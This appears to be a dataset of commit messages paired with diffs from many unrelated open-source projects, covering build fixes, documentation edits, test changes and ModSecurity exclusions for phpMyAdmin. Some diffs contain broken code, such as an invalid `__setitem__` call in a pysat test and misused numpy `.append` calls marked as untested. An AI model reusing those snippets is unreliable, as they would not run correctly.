Summary:
Python files do not allow hyphens in variable names.
Here, if the user's new repository base name has a hyphen,
we replace it with an underscore.
Test Plan: `dagster new-repo repo-hyphenated` works
Reviewers: bob | @@ -14,7 +14,7 @@ def generate_new_repo(path: str):
The name of the repository is the base of `path`.
"""
normalized_path = os.path.normpath(path)
- repo_name = os.path.basename(normalized_path)
+ repo_name = os.path.basename(normalized_path).replace("-", "_")
os.mkdir(normalized_path)
|
Issue Make ht.randn check for sane input
So far ht.randn leaves the input checking mostly to pytorch.
This patch modifies ht.randn to at least check some of the
argument properties itself.
Fixes | @@ -786,8 +786,13 @@ def randn(*args, dtype = torch.float32, split = None):
"""
num_of_param = len(args)
- # check if all positional arguments are integers
+ # check if all positional arguments are integers and greater than zero
all_ints = all([isinstance(_, int) for _ in args])
+ if not all_ints:
+ raise TypeError("Only integer-valued dimensions as arguments possible")
+ all_positive = all([_ > 0 for _ in args])
+ if not all_positive:
+ raise ValueError("Not all tensor dimensions are positive")
# define shape of tensor according to args
gshape = (args)
|
Update CREDITS.md
update doi | How to Cite
===========
-The CEA team, "City Energy Analyst v3.30.0", Zenodo, 2021, 10.5281/zenodo.5037913.
+The CEA team, "City Energy Analyst v3.30.0", Zenodo, 2021, 10.5281/zenodo.6494266.
The CEA team
============
|
Comment out console.logs
I'm assuming these were inadvertently committed. | @@ -427,8 +427,8 @@ var analyseChart = {
} else {
yAxisMax = _this.globalOptions.maxRatioItems;
}
- console.log('ratio: ' + _this.globalOptions.chartValues.ratio);
- console.log(_this.globalOptions);
+ // console.log('ratio: ' + _this.globalOptions.chartValues.ratio);
+ // console.log(_this.globalOptions);
barChart.update(_this.globalOptions.barChart,
_this.globalOptions.activeMonth,
_this.globalOptions.chartValues.ratio,
|
Update process_wrapper.py
fixed band name in example | @@ -109,7 +109,7 @@ if __name__ == "__main__":
provider="Eurac Research",
driver_url="https://openeo.eurac.edu",
image_collection="S2_L2A_T32TPS_20M",
- bands="3 11",
+ bands="B03 B11",
band_format="gtiff",
# Rumst bbox w,s,e,n
bbox_string="10.446624755859375, 46.72574176193996, 10.629272460937498, 46.845164430292755",
|
Updated column widths
The Note column is thus far unused anyway. | <th>
{% trans 'Version' %}
</th>
- <th>
+ <th class="col-sm-2">
{% trans 'Functional Version' %}
</th>
<th class="col-sm-2">
{% trans 'CCZ Name' %}
</th>
- <th class="col-sm-2">
+ <th>
{% trans 'Note' %}
</th>
<th>
|
Apple silicon support
* Apple sillicon support
* Update build_pip_pkg.sh
indent fix
* Other platforms fix. | @@ -77,14 +77,21 @@ function main() {
BUILD_CMD="setup.py bdist_wheel --platlib-patch"
if is_macos; then
+ if [[ x"$(arch)" == x"arm64" ]]; then
+ BUILD_CMD="${BUILD_CMD} --plat-name macosx_11_0_arm64"
+ else
BUILD_CMD="${BUILD_CMD} --plat-name macosx_10_13_x86_64"
fi
+ PYTHON=python3
+ else
+ PYTHON=python
+ fi
if [[ -z ${NIGHTLY_FLAG} ]]; then
# Windows has issues with locking library files for deletion so do not fail here
- python ${BUILD_CMD} || true
+ $PYTHON ${BUILD_CMD} || true
else
- python ${BUILD_CMD} ${NIGHTLY_FLAG} || true
+ $PYTHON ${BUILD_CMD} ${NIGHTLY_FLAG} || true
fi
cp dist/*.whl "${DEST}"
|
Use condition for zlib sample in Kconfig
Use `if RT_USING_DFS` for zlib sample in Kconfig. | @@ -9,10 +9,11 @@ if PKG_USING_ZLIB
string
default "/packages/misc/zlib"
+if RT_USING_DFS
config ZLIB_USING_SAMPLE
bool "Enable using zlib sample"
default n
- select RT_USING_DFS
+endif
choice
prompt "version"
|
Fix
Put InlineBoxes directly in BlockBox instead of replacing them. | @@ -397,7 +397,6 @@ def compute_content_list(content_list, parent_box, counter_values, css_token,
# in @page context. Obsoletes the parse_again function's deepcopy.
# TODO: Is propbably superfluous in_page_context.
parent_box.cached_counter_values = copy.deepcopy(counter_values)
-
for type_, value in content_list:
if type_ == 'string':
add_text(value)
@@ -1183,15 +1182,6 @@ def flex_children(box, children):
# https://www.w3.org/TR/css-flexbox-1/#flex-items
continue
if isinstance(child, boxes.InlineLevelBox):
- # TODO: Only create block boxes for text runs, not for other
- # inline level boxes. This is false but currently needed
- # because block_level_width and block_level_layout are called
- # in layout.flex.
- if isinstance(child, boxes.ParentBox):
- anonymous = boxes.BlockBox.anonymous_from(
- box, child.children)
- anonymous.style = child.style
- else:
anonymous = boxes.BlockBox.anonymous_from(box, [child])
anonymous.is_flex_item = True
flex_children.append(anonymous)
|
`six`: Fix incorrect `type[type[Any]]` annotation
Mypy will (correctly, I think) start flagging `type[type[Any]]` as an illegal annotation when mypy 0.980 comes out. Let's fix it now, before it comes out. | @@ -28,7 +28,7 @@ PY34: Literal[True]
string_types: tuple[type[str]]
integer_types: tuple[type[int]]
-class_types: tuple[type[type[Any]]]
+class_types: tuple[type[type]]
text_type = str
binary_type = bytes
|
Fix builds for OpenSSL < 1.0.2d
Enabling "make" parallelisation when building OpenSSL < 1.0.2d
causes errors. This commit modifies the OpenSSL 1.x.x recipe to
disable parallel builds for versions less than 1.0.2d. | @@ -552,6 +552,11 @@ class OpenSSLConan(ConanFile):
# /Library/Developer/CommandLineTools/usr/bin/ar: internal ranlib command failed
if self.settings.os == "Macos" and self._full_version < "1.1.0":
parallel = False
+
+ # Building in parallel for versions less than 1.0.2d causes errors
+ # See https://github.com/openssl/openssl/issues/298
+ if self._full_version < "1.0.2d":
+ parallel = False
command.append(("-j%s" % tools.cpu_count()) if parallel else "-j1")
self.run(" ".join(command), win_bash=self._win_bash)
|
Update hermite_multidimensional.hpp
Remove unnecessary vector | @@ -63,10 +63,7 @@ int update_iterator(std::vector<int> &nextPos, std::vector<int> &jumpFrom, int &
jump = 0;
}
for (int ii = 0; ii < dim; ii++) {
- std::vector<int> forwardStep(dim, 0);
- forwardStep[ii] = 1;
-
- if ( forwardStep[ii] + nextPos[ii] > cutoff) {
+ if ( nextPos[ii] + 1 > cutoff) {
nextPos[ii] = 1;
jumpFrom[ii] = 1;
jump = ii+1;
|
Corrected filename installation for anaconda users
Correct filename for setting up via Anaconda is
`install_for_anaconda.sh` | @@ -34,7 +34,7 @@ If you simply want to to _use_ PySyft, it is enough to install the library with:
```sh
python3 setup.py install
```
-note: If you have anaconda installed, you can just run `bash install_for_anaconda_users.sh`.
+note: If you have anaconda installed, you can just run `bash install_for_anaconda.sh`.
## For Contributors
If you are interested in contributing to Syft, first check out our [Contributor Quickstart Guide](https://github.com/OpenMined/Docs/blob/master/contributing/quickstart.md) and then sign into our [Slack Team](https://openmined.slack.com/) channel #team_pysyft to let us know which projects sound interesting to you! (or propose your own!).
|
Remove unnecessary tests
These tests are removed because they are too detailed and only checking ValueError without the error message also does not correctly check if the exception raised is the correct one. In addition, in the new gate class structure, the input control is moved to each class. | @@ -179,55 +179,6 @@ class TestQubitCircuit:
assert qc.gates[6].targets == [5]
assert qc.gates[5].arg_value == 1.570796
- # Test Exceptions # Global phase is not included
- for gate in _single_qubit_gates:
- if gate not in _para_gates:
- # No target
- pytest.raises(ValueError, qc.add_gate, gate, None, None)
- # Multiple targets
- pytest.raises(ValueError, qc.add_gate, gate, [0, 1, 2], None)
- # With control
- pytest.raises(ValueError, qc.add_gate, gate, [0], [1])
- else:
- # No target
- pytest.raises(ValueError, qc.add_gate, gate, None, None, 1)
- # Multiple targets
- pytest.raises(ValueError, qc.add_gate, gate, [0, 1, 2], None, 1)
- # With control
- pytest.raises(ValueError, qc.add_gate, gate, [0], [1], 1)
- for gate in _ctrl_gates:
- if gate not in _para_gates:
- # No target
- pytest.raises(ValueError, qc.add_gate, gate, None, [1])
- # No control
- pytest.raises(ValueError, qc.add_gate, gate, [0], None)
- else:
- # No target
- pytest.raises(ValueError, qc.add_gate, gate, None, [1], 1)
- # No control
- pytest.raises(ValueError, qc.add_gate, gate, [0], None, 1)
- for gate in _swap_like:
- if gate not in _para_gates:
- # Single target
- pytest.raises(ValueError, qc.add_gate, gate, [0], None)
- # With control
- pytest.raises(ValueError, qc.add_gate, gate, [0, 1], [3])
- else:
- # Single target
- pytest.raises(ValueError, qc.add_gate, gate, [0], None, 1)
- # With control
- pytest.raises(ValueError, qc.add_gate, gate, [0, 1], [3], 1)
- for gate in _fredkin_like:
- # Single target
- pytest.raises(ValueError, qc.add_gate, gate, [0], [2])
- # No control
- pytest.raises(ValueError, qc.add_gate, gate, [0, 1], None)
- for gate in _toffoli_like:
- # No target
- pytest.raises(ValueError, qc.add_gate, gate, None, [1, 2])
- # Single control
- pytest.raises(ValueError, qc.add_gate, gate, [0], [1])
-
dummy_gate1 = Gate("DUMMY1")
inds = [1, 3, 4, 6]
qc.add_gate(dummy_gate1, index=inds)
|
fix: Link on onboarding widget for add new record (fix PR#10769)
Fix broken link on onboarding widget for add new record
Fix pull request:
As used on: | @@ -136,7 +136,7 @@ export default class OnboardingWidget extends Widget {
if (step.is_single) {
route = `Form/${step.reference_document}`;
} else {
- route = `Form/${step.reference_document}/__('New')+ ' ' + ${step.reference_document}`;
+ route = __(`Form/${step.reference_document}/{0} {1}`,[__('New'),__(step.reference_document)]);
}
let current_route = frappe.get_route();
@@ -262,7 +262,7 @@ export default class OnboardingWidget extends Widget {
frappe.route_hooks.after_save = callback;
}
- frappe.set_route(`Form/${step.reference_document}/__('New')+ ' ' + ${step.reference_document}`);
+ frappe.set_route(__(`Form/${step.reference_document}/{0} {1}`,[__('New'),__(step.reference_document)]));
}
show_quick_entry(step) {
|
Update test_sw.py
Added metadata to test instrument | @@ -16,6 +16,9 @@ class TestSWKp():
index=[pysat.datetime(2009, 1, 1)
+ pds.DateOffset(hours=3*i)
for i in range(12)])
+ self.testInst.meta = pysat.Meta()
+ self.testInst.meta.__setitem__('Kp': {self.testInst.meta.fill_label:
+ np.nan})
# Load a test Metadata
self.testMeta = pysat.Meta()
|
Update client.py
Changes Chris requested - still needs testing | @@ -202,6 +202,15 @@ class CostarBulletSimulation(object):
(ok, S0, A0, S1, F1, reward) = self.task.world.tick(action)
if self.save:
+ temp_data = []
+ if os.path.isfile('data.npz'):
+ in_data = np.load('data.npz')
+ s0 = in_data['s0'].append(s0)
+ A0 = in_data['A0'].append(A0)
+ S1 = in_data['S1'].append(S1)
+ F1 = in_data['F1'].append(F1)
+ reward = in_data['reward']
+
np.savez('data', s0=s0, A0=A0, S1=S1, F1=F1, reward=reward)
if self.load:
|
Fix clang-tidy 404 in Travis
Summary: Pull Request resolved: | @@ -35,6 +35,6 @@ matrix:
apt:
sources:
- ubuntu-toolchain-r-test
- - llvm-toolchain-trusty-6.0
- packages: clang-tidy-6.0
- script: tools/run-clang-tidy-in-ci.sh -e "$(which clang-tidy-6.0)"
+ - llvm-toolchain-trusty
+ packages: clang-tidy
+ script: tools/run-clang-tidy-in-ci.sh
|
BART: set `-poisson_lambda` default to 3.0
So just using `-mask_length span-poisson` imply lambda=3.0, as in the paper. | @@ -339,7 +339,7 @@ class BARTNoiseTransform(Transform):
choices=["subword", "word", "span-poisson"],
help="Length of masking window to apply.")
group.add("--poisson_lambda", "-poisson_lambda",
- type=float, default=0.0,
+ type=float, default=3.0,
help="Lambda for Poisson distribution to sample span length "
"if `-mask_length` set to span-poisson.")
group.add("--replace_length", "-replace_length",
|
Repair nuke.workio
From | -"""Host API required by Work Files tool"""
+"""Host API required Work Files tool"""
import os
import nuke
@@ -8,37 +8,40 @@ def file_extensions():
def has_unsaved_changes():
- return nuke.Root().modified()
+ return nuke.root().modified()
def save(filepath):
- nuke.scriptSaveAs(filepath)
+ path = filepath.replace("\\", "/")
+ nuke.scriptSaveAs(path)
+ nuke.Root()["name"].setValue(path)
+ nuke.Root()["project_directory"].setValue(os.path.dirname(path))
+ nuke.Root().setModified(False)
def open(filepath):
+ filepath = filepath.replace("\\", "/")
+
+ # To remain in the same window, we have to clear the script and read
+ # in the contents of the workfile.
nuke.scriptClear()
- nuke.scriptOpen(filepath)
+ nuke.scriptReadFile(filepath)
+ nuke.Root()["name"].setValue(filepath)
+ nuke.Root()["project_directory"].setValue(os.path.dirname(filepath))
+ nuke.Root().setModified(False)
return True
def current_file():
current_file = nuke.root().name()
- normalised = os.path.normpath(current_file)
# Unsaved current file
- if nuke.Root().name() == 'Root':
- return "NOT SAVED"
+ if current_file == 'Root':
+ return None
- return normalised
+ return os.path.normpath(current_file).replace("\\", "/")
def work_root():
from avalon import Session
-
- work_dir = Session["AVALON_WORKDIR"]
- scene_dir = Session.get("AVALON_SCENEDIR")
-
- if scene_dir:
- return os.path.join(work_dir, scene_dir)
- else:
- return work_dir
+ return os.path.normpath(Session["AVALON_WORKDIR"]).replace("\\", "/")
|
Update espressif8266_extra.rst
added NonOS SDK-3.0.5 macro definition | @@ -145,7 +145,8 @@ SDK Version
Available versions (macros):
-* ``-D PIO_FRAMEWORK_ARDUINO_ESPRESSIF_SDK3`` NonOS SDK-pre-3.0 as of Jun 26, 2018
+* ``-D PIO_FRAMEWORK_ARDUINO_ESPRESSIF_SDK305`` NonOS SDK-3.0.5 (available since `Arduino core for ESP8266 3.1.0 <https://github.com/esp8266/Arduino/releases/tag/3.1.0>`_)
+* ``-D PIO_FRAMEWORK_ARDUINO_ESPRESSIF_SDK3`` NonOS SDK-pre-3.0 as of Jun 26, 2018 (removed in Arduino core for ESP8266 3.1.0)
* ``-D PIO_FRAMEWORK_ARDUINO_ESPRESSIF_SDK221`` NonOS SDK v2.2.1 (legacy) as of Jun 8, 2018
* ``-D PIO_FRAMEWORK_ARDUINO_ESPRESSIF_SDK22x_190313`` NonOS SDK v2.2.x branch as of Mar 13, 2019
* ``-D PIO_FRAMEWORK_ARDUINO_ESPRESSIF_SDK22x_190703`` NonOS SDK v2.2.x branch as of Jul 03, 2019 **(default)**
|
Remove BigOven API as it is no longer free
Per
BigOven API is only available for free for 2 weeks. | @@ -280,7 +280,6 @@ API | Description | Auth | HTTPS | CORS | Link |
### Food & Drink
API | Description | Auth | HTTPS | CORS | Link |
|---|---|---|---|---|---|
-| BigOven | Recipe Search | `X-Mashape-Key` | No | Unknown | [Go!](http://api2.bigoven.com/) |
| BreweryDB | Beer | `apiKey` | No | Unknown | [Go!](http://www.brewerydb.com/developers) |
| Edamam | Recipe Search | `apiKey` | Yes | Unknown | [Go!](https://developer.edamam.com/) |
| Food2Fork | Recipe Search | `apiKey` | No | Unknown | [Go!](http://food2fork.com/about/api) |
|
fix: fix formatting of "params.yml" for domain classification
fixes | @@ -250,8 +250,9 @@ class DomainClassification(BaseLabeling):
y_true_file.append(y_true)
accuracy = np.mean(np.array(y_true_file) == np.array(y_pred_file))
- return {'metric': 'accuracy', 'minimize': False, 'value': accuracy}
-
+ return {'metric': 'accuracy',
+ 'minimize': False,
+ 'value': float(accuracy)}
def main():
arguments = docopt(__doc__, version='Domain classification')
|
Update Germany Capacity
Use values from 2019 Fraunhofer ISE:
Subtract from Nuclear 1402MW as Philippsburg 2 has been shut off forever (not yet reflected by Fraunhofer ISE).
Hydro, Geothermal, Unknown not changed. | ]
],
"capacity": {
- "biomass": 7740,
- "coal": 44910,
- "gas": 29390,
+ "biomass": 8170,
+ "coal": 43870,
+ "gas": 29850,
"geothermal": 38,
"hydro": 4800,
"hydro storage": 9600,
- "nuclear": 9516,
- "oil": 4300,
- "solar": 47200,
+ "nuclear": 8114,
+ "oil": 4360,
+ "solar": 48570,
"unknown": 3137,
- "wind": 59830
+ "wind": 60710
},
"contributors": [
"https://github.com/corradio"
|
Jam Tests: fix utils patch
stop needs to be called on the patcher, not the mock. Furthermore,
using addCleanup is safer than tearDown because the latter may not be
called if an exception is raised in setUp. | @@ -16,11 +16,12 @@ class JamCreateTeamTests(unittest.IsolatedAsyncioTestCase):
self.guild = MockGuild([self.admin_role])
self.ctx = MockContext(bot=self.bot, author=self.command_user, guild=self.guild)
self.cog = CodeJams(self.bot)
- self.utils_mock = patch("bot.cogs.jams.utils").start()
- self.default_args = [self.cog, self.ctx, "foo"]
- def tearDown(self):
- self.utils_mock.stop()
+ utils_patcher = patch("bot.cogs.jams.utils")
+ self.utils_mock = utils_patcher.start()
+ self.addCleanup(utils_patcher.stop)
+
+ self.default_args = [self.cog, self.ctx, "foo"]
async def test_too_small_amount_of_team_members_passed(self):
"""Should `ctx.send` and exit early when too small amount of members."""
|
Utilize New DROP IF EXISTS Redshift Feature
Redshift added the ability to drop a table with an IF EXISTS, so using
that here to reduce errors. | @@ -286,7 +286,7 @@ class TableResource(SchemaResource):
timeformat 'auto'
delimiter '^' removequotes escape compupdate off """
- drop_table_stmt = """DROP TABLE {schema_name}.{table_name}"""
+ drop_table_stmt = """DROP TABLE IF EXISTS {schema_name}.{table_name}"""
def __init__(self, rs_cluster, schema, table):
SchemaResource.__init__(self, rs_cluster, schema)
|
Fix the tear down function in integration.modules.test_grains.GrainsAppendTestCase
Fix the tear down function to just set the grain to an empty list instead of
removing each individual item | @@ -152,8 +152,7 @@ class GrainsAppendTestCase(ModuleCase):
GRAIN_VAL = 'my-grain-val'
def tearDown(self):
- for item in self.run_function('grains.get', [self.GRAIN_KEY]):
- self.run_function('grains.remove', [self.GRAIN_KEY, item])
+ self.run_function('grains.setval', [self.GRAIN_KEY, []])
def test_grains_append(self):
'''
|
phpMyAdmin: exclude tbl_select.php
Search rows in a table.
MySQL chars such as '%' trigger rules on ARGS:criteriaColumnTypes[n]
so the only way to prevent them is to exclude whole ARGS, trying
to keep the number of excluded rules minimal. | @@ -285,5 +285,19 @@ SecAction \
ctl:ruleRemoveTargetById=942200;REQUEST_COOKIES:pma_console_config,\
ctl:ruleRemoveTargetById=942260;REQUEST_COOKIES:pma_console_config"
+# Search rows in a table
+# MySQL chars such as '%' trigger rules on ARGS:criteriaColumnTypes[n]
+SecRule REQUEST_FILENAME "@endsWith /tbl_select.php" \
+ "id:9008270,\
+ phase:1,\
+ pass,\
+ t:none,\
+ nolog,\
+ chain"
+ SecRule &REQUEST_COOKIES_NAMES:'/^(?:phpMyAdmin|phpMyAdmin_https)$/' "@eq 1" \
+ "t:none,\
+ ctl:ruleRemoveTargetById=942440;ARGS:orderByColumn,\
+ ctl:ruleRemoveTargetById=942470;ARGS,\
+ ctl:ruleRemoveTargetById=942300;ARGS"
SecMarker "END-PHPMYADMIN"
|
Fix webnovelonlinenet chapter list
Chapter list is now in the novel info page instead of in a different request | @@ -53,24 +53,13 @@ class WebNovelOnlineNet(Crawler):
self.novel_author = author[0].text
logger.info("Novel author: %s", self.novel_author)
- self.novel_id = soup.select_one("#manga-chapters-holder")["data-id"]
- logger.info("Novel id: %s", self.novel_id)
-
- response = self.submit_form(
- chapter_list_url, data="action=manga_get_chapters&manga=" + self.novel_id
- )
- soup = self.make_soup(response)
- for a in reversed(soup.select(".wp-manga-chapter a")):
- chap_id = len(self.chapters) + 1
- vol_id = 1 + len(self.chapters) // 100
- if chap_id % 100 == 1:
- self.volumes.append({"id": vol_id})
+ for li in reversed(soup.select(".listing-chapters_wrap ul li")):
+ a = li.select_one("a")
self.chapters.append(
{
- "id": chap_id,
- "volume": vol_id,
- "title": a.text.strip(),
+ "id": len(self.chapters) + 1,
"url": self.absolute_url(a["href"]),
+ "title": a.text.strip(),
}
)
|
Added filter out for Ubuntu 12.04
The feature enable patch was not checked into this version of kernel source code. kernel.ubuntu.com/ubuntu/ubuntu-precise.git | @@ -37,6 +37,12 @@ if ! VerifyIsEthtool; then
exit 0
fi
+if [[ $DISTRO == "ubuntu 12.04"* ]]; then
+ LogErr "This distro $DISTRO does not support $ETHTOOL_KEYS features"
+ SetTestStateSkipped
+ exit 0
+fi
+
GetSynthNetInterfaces
if ! GetSynthNetInterfaces; then
msg="ERROR: No synthetic network interfaces found"
|
NONE fix verify_response default arguments
* fix default none arguments
* refactor func
* Update abstract_clients.py
fix comments | @@ -77,7 +77,7 @@ class RestClient(Client):
return response
def __verify_response(self, response: Response, error_msg: str, expected_status_codes: list = None):
- if response.ok or response.status_code in expected_status_codes:
+ if response.ok or (expected_status_codes and response.status_code in expected_status_codes):
return
status_code = response.status_code
|
Garbage collect on no_thread_leaks fixture
That should avoid counting a pseudo-dangling thread that had already
been stopped, but hadn't been garbage collected yet because of some
circular reference (or something else) | from functools import partial
+import gc
import os
import threading
import pytest
@@ -28,6 +29,7 @@ def no_thread_leaks():
We do not use pytest-threadleak because it is not reliable.
"""
yield
+ gc.collect() # Clear the stuff from other function-level fixtures
assert threading.active_count() == 1 # Only the main thread
|
Update docs to reflect new maximum timeout value
Based on this change: | @@ -159,7 +159,7 @@ To create a "cron" check, specify the "schedule" and "tz" parameters.
<td>
<p>number, optional, default value: {{ default_timeout }}.</p>
<p>A number of seconds, the expected period of this check.</p>
- <p>Minimum: 60 (one minute), maximum: 604800 (one week).</p>
+ <p>Minimum: 60 (one minute), maximum: 2592000 (30 days).</p>
<p>Example for 5 minute timeout:</p>
<pre>{"kind": "simple", "timeout": 300}</pre>
</td>
@@ -292,7 +292,7 @@ To create a "cron" check, specify the "schedule" and "tz" parameters.
<td>
<p>number, optional.</p>
<p>A number of seconds, the expected period of this check.</p>
- <p>Minimum: 60 (one minute), maximum: 604800 (one week).</p>
+ <p>Minimum: 60 (one minute), maximum: 2592000 (30 days).</p>
<p>Example for 5 minute timeout:</p>
<pre>{"kind": "simple", "timeout": 300}</pre>
</td>
|
Remove unused type check 'int' in audit.py
Although this method does not report an error, this type check 'int'
is redundant and may be misleading.
Refercnce code url: | @@ -523,7 +523,7 @@ class AuditsController(rest.RestController):
return audits_collection
@wsme_pecan.wsexpose(AuditCollection, types.uuid, int, wtypes.text,
- wtypes.text, wtypes.text, wtypes.text, int)
+ wtypes.text, wtypes.text, wtypes.text)
def get_all(self, marker=None, limit=None, sort_key='id', sort_dir='asc',
goal=None, strategy=None):
"""Retrieve a list of audits.
|
README: manual newline formatting
Ugh. rst is terrible :) | @@ -63,10 +63,10 @@ and `guidelines`_ for contributing in the documentation.
Maintainers
===========
-`@tych0`_ GPG: ``3CCA B226 289D E016 0C61 BDB4 18D1 8F1B C464 DCA3``
-`@ramnes`_ GPG: ``99CC A84E 2C8C 74F3 2E12 AD53 8C17 0207 0803 487A``
-`@m-col`_ GPG: ``35D9 2E7C C735 7A81 173E A1C9 74F9 FDD2 0984 FBEC``
-`@flacjacket`_ GPG: ``58B5 F350 8339 BFE5 CA93 AC9F 439D 9701 E7EA C588``
+| `@tych0`_ GPG: ``3CCA B226 289D E016 0C61 BDB4 18D1 8F1B C464 DCA3``
+| `@ramnes`_ GPG: ``99CC A84E 2C8C 74F3 2E12 AD53 8C17 0207 0803 487A``
+| `@m-col`_ GPG: ``35D9 2E7C C735 7A81 173E A1C9 74F9 FDD2 0984 FBEC``
+| `@flacjacket`_ GPG: ``58B5 F350 8339 BFE5 CA93 AC9F 439D 9701 E7EA C588``
.. _`@tych0`: https://github.com/tych0
.. _`@ramnes`: https://github.com/ramnes
|
Fix styles on RTL languages.
Fixes | .DevHub-MyAddons-item-modified {
margin-left: auto;
align-self: flex-end;
+
+ html[dir=rtl] & {
+ margin-right: auto;
+ margin-left: 0;
+ }
}
.DevHub-MyAddons-item-details {
margin-left: 25px;
a {
- margin-left: 5px;
font-size: 15px;
text-decoration: none;
color: @color-button-default;
+ margin: 0 5px;
&.DevHub-MyAddons-version-status-incomplete,
&.DevHub-MyAddons-version-status-deleted,
font-size: 13px;
font-weight: 500;
color: #fff;
+ margin: 0 5px;
}
.DevHub-MyAddons-item-channel-listed {
}
.DevHub-MyAddons-item-version-details {
+ display: flex;
width: 320px;
}
+.DevHub-MyAddons-item-version {
+ margin: 0 5px;
+}
+
.DevHub-MyAddons-item-buttons {
margin-top: 20px;
display: flex;
.DevHub-MyAddons-item-buttons-submit {
margin-left: auto;
+
+ html[dir=rtl] & {
+ margin-right: auto;
+ margin-left: 0;
+ }
}
.DevHub-MyAddons-whatsnew-container {
background-repeat: no-repeat;
background-position: right 10px bottom 10px;
+ html[dir=rtl] & {
+ background-position: left 35px bottom 10px;
+ }
+
&::before {
content: '';
background-image: url("../../../img/developers/new-landing/whatsnew-rocket.png");
top: 28px;
pointer-events: none;
+ html[dir=rtl] & {
+ transform: scaleX(-1);
+ left: auto;
+ right: -8px;
+ }
+
@media @retina {
background-image: url("../../../img/developers/new-landing/whatsnew-rocket-2x.png");
}
div:first-child {
text-align: right;
+
+ html[dir=rtl] & {
+ text-align: left;
+ }
}
p,
|
fix(views): fix cleanup of non-interactive view runtimes
Previously non-interactive view runtimes never got removed from
ViewRuntimeController._view_runtimes properly. This becomes a problem when
combining non-interactive views and limiting concurrent users
(https://lona-web.org/cookbook/limit-concurrent-views.html) | @@ -272,7 +272,14 @@ class ViewRuntimeController:
)
else:
- return view_runtime.start()
+ response_dict = view_runtime.start()
+
+ # Non interactive runtimes don't have to be held in memory, after
+ # handle_request() finished, because they can't be daemonized or
+ # receive input events.
+ self.remove_view_runtime(view_runtime)
+
+ return response_dict
views_logger.debug('message handled')
|
Shift non-interactive flag handling earlier in chain
Generate the appropriate behavior (prompt vs. raise exception) in get_username and get_password via a helper method rather than passing the non-interactive flag down through all the helper functions. This allows the later helper functions to be reverted back to their original, simpler forms. | @@ -238,38 +238,45 @@ def get_password_from_keyring(system, username):
warnings.warn(str(exc))
-def non_interactive_check_prompt(non_interactive, prompt_func, prompt_type):
- if non_interactive:
- error_message = "Credential not found for {}.".format(prompt_type)
- raise exceptions.NonInteractive(error_message)
- else:
- message = "Enter your {}: ".format(prompt_type)
- return prompt_func(message)
-
-
-def username_from_keyring_or_prompt(system, non_interactive):
+def username_from_keyring_or_prompt(system, prompt_func):
return (
get_username_from_keyring(system)
- or non_interactive_check_prompt(
- non_interactive,
- input_func,
- 'username',
- )
+ or prompt_func()
)
-def password_from_keyring_or_prompt(system, username, non_interactive):
+def password_from_keyring_or_prompt(system, username, prompt_func):
return (
get_password_from_keyring(system, username)
- or non_interactive_check_prompt(
- non_interactive,
- password_prompt,
- 'password',
+ or prompt_func()
+ )
+
+
+def raises_noninteractive_exc(message):
+ raise exceptions.NonInteractive(message)
+
+
+def generate_prompt_func_from(prompt_func, prompt_type, non_interactive):
+ if non_interactive:
+ error_message = "Credential not found for {}.".format(prompt_type)
+ return functools.partial(
+ raises_noninteractive_exc,
+ error_message,
)
+ else:
+ message = "Enter your {}: ".format(prompt_type)
+ return functools.partial(
+ prompt_func,
+ message,
)
def get_username(system, cli_value, config, non_interactive):
+ prompt_func = generate_prompt_func_from(
+ input_func,
+ 'username',
+ non_interactive,
+ )
return get_userpass_value(
cli_value,
config,
@@ -277,7 +284,7 @@ def get_username(system, cli_value, config, non_interactive):
prompt_strategy=functools.partial(
username_from_keyring_or_prompt,
system,
- non_interactive,
+ prompt_func,
)
)
@@ -311,6 +318,11 @@ class EnvironmentDefault(argparse.Action):
def get_password(system, username, cli_value, config, non_interactive):
+ prompt_func = generate_prompt_func_from(
+ password_prompt,
+ 'password',
+ non_interactive,
+ )
return get_userpass_value(
cli_value,
config,
@@ -319,7 +331,7 @@ def get_password(system, username, cli_value, config, non_interactive):
password_from_keyring_or_prompt,
system,
username,
- non_interactive,
+ prompt_func,
),
)
|
Updates warning text when unpickling figures fails.
Text is now less confusing, stating explicitly what the error
was, and whether a successful workaround was performed. | @@ -71,14 +71,14 @@ class ReportFigure(object):
try:
self._save_axes(filename)
except Exception as e:
- print('Initial unpickling of figure failed, trying to use cached formats')
+ print('Warning: unpickling to save figure %s failed:\n %s' % (filename, str(e)))
ext = os.path.splitext(filename)[1][1:] # remove .
- print(ext)
if ext in self.tempFileDict:
tf = _tempfile.NamedTemporaryFile()
tf.write(self.tempFileDict[ext])
_shutil.copy2(tf.name, filename)
tf.close()
+ print(" --> Successfully used cached %s format" % ext)
else:
print('Extension not in cached files and unpickling failed. Trying experimental backend switching. Your machine may catch fire..')
# Subprocess didn't work without auxillary file (cannot import parent module '') -> we weren't desperate enough to do the auxillary file, so no promises that works either
|
Add more clear error message for Doubly Robusts CPE
Summary:
`ValueError: a must be non-empty` happens if no valid doubly-robust data is generated. Possibly because the user specifies wrong metric names. So we try to assert early on this issue.
See: | @@ -85,6 +85,14 @@ class SequentialDoublyRobustEstimator:
last_episode_end = episode_end
i += 1
+ assert len(doubly_robusts) > 0, (
+ f"No valid doubly robusts data is generated. "
+ f"Logged_rewards={logged_rewards}, importance_weight={importance_weight},"
+ f" estimated_q_values_for_logged_action={estimated_q_values_for_logged_action}"
+ f" estimated_state_values={estimated_state_values}, gamma={self.gamma}"
+ f" Did you specify wrong metric names?"
+ )
+
doubly_robusts = np.array(doubly_robusts) # type: ignore
dr_score = float(np.mean(doubly_robusts))
dr_score_std_error = bootstrapped_std_error_of_mean(doubly_robusts)
|
Remove double-running dagster-gcp tests
Test Plan: na
Reviewers: alangenfeld | @@ -321,7 +321,6 @@ def deploy_trigger_step():
steps += library_tests()
- steps += gcp_tests()
steps += examples_tests()
steps += [wait_step(), coverage_step(), wait_step(), deploy_trigger_step()]
|
Start slower test runs first.
In case there aren't enough self hosted runners | @@ -79,6 +79,46 @@ jobs:
with:
changed-files: ${{ needs.get-changed-files.outputs.changed-files }}
+ windows-2016:
+ name: Windows 2016
+ needs:
+ - get-changed-files
+ uses: ./.github/workflows/test-action.yml
+ with:
+ distro-slug: windows-2016
+ nox-session: ci-test
+ changed-files: ${{ needs.get-changed-files.outputs.changed-files }}
+
+ windows-2019:
+ name: Windows 2019
+ needs:
+ - get-changed-files
+ uses: ./.github/workflows/test-action.yml
+ with:
+ distro-slug: windows-2019
+ nox-session: ci-test
+ changed-files: ${{ needs.get-changed-files.outputs.changed-files }}
+
+ windows-2022:
+ name: Windows 2022
+ needs:
+ - get-changed-files
+ uses: ./.github/workflows/test-action.yml
+ with:
+ distro-slug: windows-2022
+ nox-session: ci-test
